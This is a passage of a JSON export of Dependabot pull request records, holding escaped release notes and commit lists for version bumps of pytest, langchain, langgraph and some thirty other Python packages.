deprecated.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/b2522cf0b11fb33ecc1f4895fa1dffbb9252a63d\"\u003e\u003ccode\u003eb2522cf\u003c/code\u003e\u003c/a\u003e Prepare release version 9.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/368d2fca78e86ac79ec269bb078fcb1259a94fed\"\u003e\u003ccode\u003e368d2fc\u003c/code\u003e\u003c/a\u003e [refactor] Tighten \u003ccode\u003eSetComparisonFunction\u003c/code\u003e to \u003ccode\u003eIterator[str]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14587\"\u003e#14587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/ff77cd8b66b43a88c26ca54384bbcab72d079497\"\u003e\u003ccode\u003eff77cd8\u003c/code\u003e\u003c/a\u003e [refactor] Make base assertion comparisons return an iterator instead of a li...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/0d8491a4ecf971800de0479ef55c7f5292c54937\"\u003e\u003ccode\u003e0d8491a\u003c/code\u003e\u003c/a\u003e build(deps): Bump actions/stale from 10.2.0 to 10.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/4a809d9c892f6abb5ba92b77b06f1dd878f4660a\"\u003e\u003ccode\u003e4a809d9\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14568\"\u003e#14568\u003c/a\u003e from pytest-dev/register-fixture\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/5dfa38541becfb77d0f52cac4cc8cce71849ab61\"\u003e\u003ccode\u003e5dfa385\u003c/code\u003e\u003c/a\u003e Fix recursion traceback test to cover all styles (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14582\"\u003e#14582\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/f52ff0c1778c15038cf2bbb00b7668dac674cc26\"\u003e\u003ccode\u003ef52ff0c\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003epytest.register_fixture\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/a8ac094e80df788aec844794170b126eab0be7a4\"\u003e\u003ccode\u003ea8ac094\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14567\"\u003e#14567\u003c/a\u003e from pytest-dev/more-visibility-deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/e5620cd21ec62f5a5f9a5141a3c76fb3953729b6\"\u003e\u003ccode\u003ee5620cd\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14577\"\u003e#14577\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/2ce9c6d94eb691ea4da7f91f330602cbb67a6daf\"\u003e\u003ccode\u003e2ce9c6d\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14540\"\u003e#14540\u003c/a\u003e from minbang930/fix-14533-doctest-module-fixtures\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/pytest/compare/9.0.3...9.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/pycontribs/jira/pull/2434","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/pycontribs%2Fjira/issues/2434","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2434/packages"},{"uuid":"4660143493","node_id":"PR_kwDORoD75c7mSWXu","number":130,"state":"closed","title":"chore(deps): bump the minor-and-patch group in /libs/cli with 36 updates","user":"dependabot[bot]","labels":["dependencies","python:uv"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-06-14T18:28:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-14T18:23:41.000Z","updated_at":"2026-06-14T18:28:23.000Z","time_to_close":280,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"minor-and-patch","update_count":36,"packages":[{"name":"langchain","old_version":"1.3.1","new_version":"1.3.9","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langgraph","old_version":"1.2.0","new_version":"1.2.5","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"langgraph-sdk","old_version":"0.3.14","new_version":"0.4.2","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"langchain-openai","old_version":"1.2.1","new_version":"1.3.2","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.5","new_version":"0.8.15","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"textual","old_version":"8.2.6","new_version":"8.2.7","repository_url":"https://github.com/Textualize/textual"},{"name":"uuid-utils","old_version":"0.15.0","new_version":"0.16.0","repository_url":"https://github.com/aminalaee/uuid-utils"},{"name":"langchain-mcp-adapters","old_version":"0.2.2","new_version":"0.3.0","repository_url":"https://github.com/langchain-ai/langchain-mcp-adapters"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-multipart","old_version":"0.0.29","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"langchain-anthropic","old_version":"1.4.3","new_version":"1.4.6","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-aws","old_version":"1.4.7","new_version":"1.5.1","repository_url":"https://github.com/langchain-ai/langchain-aws"},{"name":"langchain-cohere","old_version":"0.5.1","new_version":"0.6.0","repository_url":"https://github.com/langchain-ai/langchain-cohere"},{"name":"langchain-deepseek","old_version":"1.0.1","new_version":"1.1.0","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-google-genai","old_version":"4.2.2","new_version":"4.2.5","repository_url":"https://github.com/langchain-ai/langchain-google"},{"name":"langchain-groq","old_version":"1.1.2","new_version":"1.1.3","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-ibm","old_version":"1.0.10","new_version":"1.1.0","repository_url":"https://github.com/langchain-ai/langchain-ibm"},{"name":"langchain-litellm","old_version":"0.6.5","new_version":"0.6.6","repository_url":"https://github.com/langchain-ai/langchain-litellm"},{"name":"langchain-mistralai","old_version":"1.1.4","new_version":"1.1.5","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-nvidia-ai-endpoints","old_version":"1.3.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain-nvidia"},{"name":"langchain-perplexity","old_version":"1.2.0","new_version":"1.4.0","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-google-vertexai","old_version":"3.2.3","new_version":"3.2.4","repository_url":"https://github.com/langchain-ai/langchain-google"},{"name":"daytona","old_version":"0.176.0","new_version":"0.187.0"},{"name":"modal","old_version":"1.4.2","new_version":"1.5.0","repository_url":"https://github.com/modal-labs/modal-client"},{"name":"runloop-api-client","old_version":"1.21.0","new_version":"1.23.2","repository_url":"https://github.com/runloopai/api-client-python"},{"name":"tavily-python","old_version":"0.7.24","new_version":"0.7.26","repository_url":"https://github.com/tavily-ai/tavily-python"},{"name":"ruff","old_version":"0.15.13","new_version":"0.15.17","repository_url":"https://github.com/astral-sh/ruff"},{"name":"ty","old_version":"0.0.37","new_version":"0.0.49","repository_url":"https://github.com/astral-sh/ty"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"pytest-socket","old_version":"0.7.0","new_version":"0.8.0","repository_url":"https://github.com/miketheman/pytest-socket"},{"name":"responses","old_version":"0.26.0","new_version":"0.26.1","repository_url":"https://github.com/getsentry/responses"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.7","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"starlette","old_version":"1.2.1","new_version":"1.3.1","repository_url":"https://github.com/Kludex/starlette"},{"name":"uvicorn","old_version":"0.47.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"agent-client-protocol","old_version":"0.10.0","new_version":"0.10.1","repository_url":"https://github.com/agentclientprotocol/python-sdk"}],"path":"/libs/cli","ecosystem":"pip"},"body":"Bumps the minor-and-patch group in /libs/cli with 36 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [langchain](https://github.com/langchain-ai/langchain) | `1.3.1` | `1.3.9` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | `1.2.0` | `1.2.5` |\n| [langgraph-sdk](https://github.com/langchain-ai/langgraph) | `0.3.14` | `0.4.2` |\n| [langchain-openai](https://github.com/langchain-ai/langchain) | `1.2.1` | `1.3.2` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.5` | `0.8.15` |\n| [textual](https://github.com/Textualize/textual) | `8.2.6` | `8.2.7` |\n| [uuid-utils](https://github.com/aminalaee/uuid-utils) | `0.15.0` | `0.16.0` |\n| [langchain-mcp-adapters](https://github.com/langchain-ai/langchain-mcp-adapters) | `0.2.2` | `0.3.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.29` | `0.0.32` |\n| [langchain-anthropic](https://github.com/langchain-ai/langchain) | `1.4.3` | `1.4.6` |\n| [langchain-aws](https://github.com/langchain-ai/langchain-aws) | `1.4.7` | `1.5.1` |\n| [langchain-cohere](https://github.com/langchain-ai/langchain-cohere) | `0.5.1` | `0.6.0` |\n| [langchain-deepseek](https://github.com/langchain-ai/langchain) | `1.0.1` | `1.1.0` |\n| [langchain-google-genai](https://github.com/langchain-ai/langchain-google) | `4.2.2` | `4.2.5` |\n| [langchain-groq](https://github.com/langchain-ai/langchain) | `1.1.2` | `1.1.3` |\n| [langchain-ibm](https://github.com/langchain-ai/langchain-ibm) | `1.0.10` | `1.1.0` |\n| [langchain-litellm](https://github.com/langchain-ai/langchain-litellm) | `0.6.5` | `0.6.6` |\n| [langchain-mistralai](https://github.com/langchain-ai/langchain) | `1.1.4` | `1.1.5` |\n| [langchain-nvidia-ai-endpoints](https://github.com/langchain-ai/langchain-nvidia) | `1.3.0` | `1.4.1` |\n| [langchain-perplexity](https://github.com/langchain-ai/langchain) | `1.2.0` | `1.4.0` |\n| [langchain-google-vertexai](https://github.com/langchain-ai/langchain-google) | `3.2.3` | `3.2.4` |\n| daytona | `0.176.0` | `0.187.0` |\n| [modal](https://github.com/modal-labs/modal-client) | `1.4.2` | `1.5.0` |\n| [runloop-api-client](https://github.com/runloopai/api-client-python) | `1.21.0` | `1.23.2` |\n| [tavily-python](https://github.com/tavily-ai/tavily-python) | `0.7.24` | `0.7.26` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.13` | `0.15.17` |\n| [ty](https://github.com/astral-sh/ty) | `0.0.37` | `0.0.49` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.3` | `9.1.0` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [pytest-socket](https://github.com/miketheman/pytest-socket) | `0.7.0` | `0.8.0` |\n| [responses](https://github.com/getsentry/responses) | `0.26.0` | `0.26.1` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.7` |\n| [starlette](https://github.com/Kludex/starlette) | `1.2.1` | `1.3.1` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.47.0` | `0.49.0` |\n| [agent-client-protocol](https://github.com/agentclientprotocol/python-sdk) | `0.10.0` | `0.10.1` |\n\nUpdates `langchain` from 1.3.1 to 1.3.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain==1.3.9\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.8\u003c/p\u003e\n\u003cp\u003erelease(anthropic): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38105\"\u003e#38105\u003c/a\u003e)\nrelease(langchain): 1.3.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38104\"\u003e#38104\u003c/a\u003e)\nfix(langchain,anthropic): confine file-search results and tighten anthropic \u003ccode\u003eallowed_prefixes\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38106\"\u003e#38106\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.8\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.7\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.8 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38096\"\u003e#38096\u003c/a\u003e)\nstyle(core,langchain,langchain-classic,partners): replace double backticks in docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38095\"\u003e#38095\u003c/a\u003e)\nrelease(core): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38061\"\u003e#38061\u003c/a\u003e)\nchore(langchain): add overloads to \u003ccode\u003ecreate_agent\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34309\"\u003e#34309\u003c/a\u003e)\nchore(infra): bump mypy to 2.1 and unify type-check config across the monorepo (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/36470\"\u003e#36470\u003c/a\u003e)\nfix(langchain): support async middleware decorator typing (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34584\"\u003e#34584\u003c/a\u003e)\nfix(langchain): tighten structured output model fallbacks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38042\"\u003e#38042\u003c/a\u003e)\nrelease(anthropic): 1.4.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38036\"\u003e#38036\u003c/a\u003e)\nhotfix(core): bump lockfile(s) (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38032\"\u003e#38032\u003c/a\u003e)\nrefactor(langchain): refactor \u003ccode\u003etest_create_agent_tool_validation\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34443\"\u003e#34443\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.7\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.6\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.7 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38024\"\u003e#38024\u003c/a\u003e)\nstyle(langchain): add ruff rules ARG (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34435\"\u003e#34435\u003c/a\u003e)\nfeat(langchain): add \u003ccode\u003eProviderToolSearchMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37969\"\u003e#37969\u003c/a\u003e)\nchore(langchain): activate mypy \u003ccode\u003ewarn_return_any\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34249\"\u003e#34249\u003c/a\u003e)\ntest(langchain): mark legacy trigger view for 2.0 removal (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38002\"\u003e#38002\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.6\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.5\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38001\"\u003e#38001\u003c/a\u003e)\nfix(langchain): preserve summarization trigger compatibility (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38000\"\u003e#38000\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.5\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.4\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37998\"\u003e#37998\u003c/a\u003e)\nfeat(langchain): port AND-capable trigger conditions to \u003ccode\u003eSummarizationMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34576\"\u003e#34576\u003c/a\u003e)\nhotfix(openai): min core dep (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37990\"\u003e#37990\u003c/a\u003e)\nfeat(openai): support \u003ccode\u003eapply_patch\u003c/code\u003e built-in tool (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37157\"\u003e#37157\u003c/a\u003e)\nchore: bump pyarrow from 21.0.0 to 23.0.1 in /libs/langchain_v1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37930\"\u003e#37930\u003c/a\u003e)\nchore: bump dependencies  (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37892\"\u003e#37892\u003c/a\u003e)\nchore: bump aiohttp from 3.13.4 to 3.14.0 in /libs/langchain_v1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37888\"\u003e#37888\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.4\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.3\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3bfb6a33e788aaca1626a7c09cbdbdbef6977012\"\u003e\u003ccode\u003e3bfb6a3\u003c/code\u003e\u003c/a\u003e release(langchain): 1.3.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38104\"\u003e#38104\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/dcaf7795a3e6590af55c3ff7bda6add6355e9ea6\"\u003e\u003ccode\u003edcaf779\u003c/code\u003e\u003c/a\u003e fix(langchain,anthropic): confine file-search results and tighten anthropic `...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0392b6bae4bdfc0b7ed5aeb2e9e414bbb7ea643b\"\u003e\u003ccode\u003e0392b6b\u003c/code\u003e\u003c/a\u003e fix(core): fix Pydantic v1 support in tools/runnable (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/33698\"\u003e#33698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/f6d63bc9f344b2949e91a6904d301553376b4f10\"\u003e\u003ccode\u003ef6d63bc\u003c/code\u003e\u003c/a\u003e release(langchain): 1.3.8 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38096\"\u003e#38096\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/5d20596d73789020f53c622b22c0a9893ba09606\"\u003e\u003ccode\u003e5d20596\u003c/code\u003e\u003c/a\u003e style(core,langchain,langchain-classic,partners): replace double backticks in...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/fb55c6660a2ac26038a64dac1534048294bc51ab\"\u003e\u003ccode\u003efb55c66\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/huggingface (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38\"\u003e#38\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/51daae5c139712f6f1347b5a801f672680ba1eba\"\u003e\u003ccode\u003e51daae5\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/chroma (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38092\"\u003e#38092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/70e9579e433043321fb8e93a8a51770c946363d0\"\u003e\u003ccode\u003e70e9579\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/fireworks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38093\"\u003e#38093\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6c0e9af3246e3bbf98838e4b9ec563ad563dd748\"\u003e\u003ccode\u003e6c0e9af\u003c/code\u003e\u003c/a\u003e chore: bump langsmith from 0.8.9 to 0.8.14 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38094\"\u003e#38094\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/222dc846e0e965a0d6764d772226590eec14b917\"\u003e\u003ccode\u003e222dc84\u003c/code\u003e\u003c/a\u003e ci(infra): clarify early PR auto-close guidance (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38090\"\u003e#38090\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain==1.3.1...langchain==1.3.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langgraph` from 1.2.0 to 1.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langgraph/releases\"\u003elanggraph's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elanggraph==1.2.5\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.4\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8062\"\u003e#8062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): merge \u003ccode\u003elc_versions\u003c/code\u003e config metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8052\"\u003e#8052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(cli): 0.4.28 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8041\"\u003e#8041\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: updateState bug for deltaChannel on empty thread (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8011\"\u003e#8011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: migrate Python type checking to ty (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8002\"\u003e#8002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump types-requests from 2.33.0.20260408 to 2.33.0.20260518 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7977\"\u003e#7977\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump the minor-and-patch group in /libs/langgraph with 14 updates (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7975\"\u003e#7975\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.4\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.3\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7991\"\u003e#7991\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etest(sdk-py): add factory-graph integration test exercising the server factory path (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7978\"\u003e#7978\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): keep _on_started backward-compatible with overrides predating cause (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7987\"\u003e#7987\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.3\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.2\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.3 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7945\"\u003e#7945\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): wire RemoteGraph.interleave to sdk-py interleave_projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7938\"\u003e#7938\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add v3 streaming support to RemoteGraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7927\"\u003e#7927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): name tool-dispatched subagents via lc_agent_name (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7928\"\u003e#7928\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): rename ProtocolEvent.eventId to event_id to match the wire field (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7942\"\u003e#7942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): merge instead of overwrite in ensure_config for callbacks, tags, metadata, configurable (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7926\"\u003e#7926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): [LSD-1507] Distinguish between user cancelled and other cancellations (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7920\"\u003e#7920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cli): bump api bound to 0.10.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7922\"\u003e#7922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add websocket stream transports (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7830\"\u003e#7830\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add messages and tool call projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7823\"\u003e#7823\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add v3 streaming primitives and SSE transport (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7818\"\u003e#7818\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.2\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003echore(langgraph): bump version to 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7914\"\u003e#7914\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): assign stable IDs to id=None BaseMessages before DeltaChannel checkpoint writes (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7913\"\u003e#7913\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(checkpoint): 4.1.1 (\u003ca 